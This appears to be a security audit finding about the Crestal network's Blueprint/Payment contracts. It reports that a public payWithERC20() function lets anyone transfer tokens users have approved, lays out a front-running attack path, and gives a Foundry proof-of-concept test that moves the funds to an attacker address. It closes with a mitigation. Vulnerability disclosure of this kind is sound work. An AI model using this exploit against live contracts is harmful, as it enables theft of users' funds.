Warm Basil Yak

High

# Attacker can steal approved tokens for `Blueprint` contract

### Summary
The `payWithERC20()` function in `Payment` contract is external and has no access control. this issue can lead to stealing users approved tokens from `Blueprint` contract.


```solidity

function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) public {
        // check from and to address
        require(fromAddress != toAddress, "Cannot transfer to self address");
        require(toAddress != address(0), "Invalid to address");
        require(amount > 0, "Amount must be greater than 0");
        IERC20 token = IERC20(erc20TokenAddress);
        token.safeTransferFrom(fromAddress, toAddress, amount);
    }

```
https://github.com/sherlock-audit/2025-03-crestal-network/blob/27a3c28155702b3a68f29347efedffb048010e33/crestal-omni-contracts/src/Payment.sol#L25


### Root Cause

.

### Internal Pre-conditions

.

### External Pre-conditions

.

### Attack Path

Attack scenario:
- User want to call `userTopUp()` function
- User firstly approve to contract with X amount
- Attacker front-run user `userTopUp()` function call
- Now attacker simply transferred User X amount to own wallet

Also, users might have allowances to the contract and any allowances to contract can steal by attackers.

### Impact

Attacker can steal users approved tokens.

### PoC

function test_poc() public {
        string memory base64Proposal = "test base64 proposal";
        string memory serverURL = "http://example.com";

        // Generate the signature
        (bytes memory signature, address signerAddress) = generateSignature(projectId, base64Proposal, serverURL);

        // Add the payment address
        blueprint.addPaymentAddress(address(mockToken));

        // set zero cost for create agents, use any number less than 0
        blueprint.setCreateAgentTokenCost(address(mockToken), 0);

        // Expect the createAgent event
        vm.expectEmit(true, false, true, true);
        emit BlueprintCore.CreateAgent(projectId, "fake", signerAddress, 0, 0);

        // Create agent with token
        blueprint.createAgentWithTokenWithSig(
            projectId, base64Proposal, workerAddress, serverURL, address(mockToken), signature
        );

        bytes32 latestProjId = blueprint.getLatestUserProjectID(signerAddress);
        assertEq(projectId, latestProjId);

        // Mint tokens to the test account
        uint256 validTokenAmount = 100 * 10 ** 18;

        // set none zero cost for create agents, use any number greater than 0
        blueprint.setCreateAgentTokenCost(address(mockToken), validTokenAmount);

        mockToken.mint(address(this), validTokenAmount);

        // Verify the mint
        uint256 balance = mockToken.balanceOf(address(this));
        assertEq(balance, validTokenAmount, "sender does not have the correct token balance");

        // check LogApproveEvent
        vm.expectEmit(true, true, false, true);
        emit MockERC20.LogApproval(address(this), address(blueprint), validTokenAmount);

        // Approve the blueprint contract to spend tokens directly from the test contract
        mockToken.approve(address(blueprint), validTokenAmount);

        // check allowance after approve
        uint256 allowance = mockToken.allowance(address(this), address(blueprint));
        assertEq(allowance, validTokenAmount, "sender does not have the correct token allowance");

        //Attacker
        address attacker = makeAddr("attacker");
        blueprint.payWithERC20(address(mockToken), 100e18, address(this), attacker);

        console.log(mockToken.balanceOf(address(attacker)));
        console.log(mockToken.balanceOf(address(this)));
    }

### Mitigation

Consider changing `payWithERC20()` function to `internal` function instead of `external`.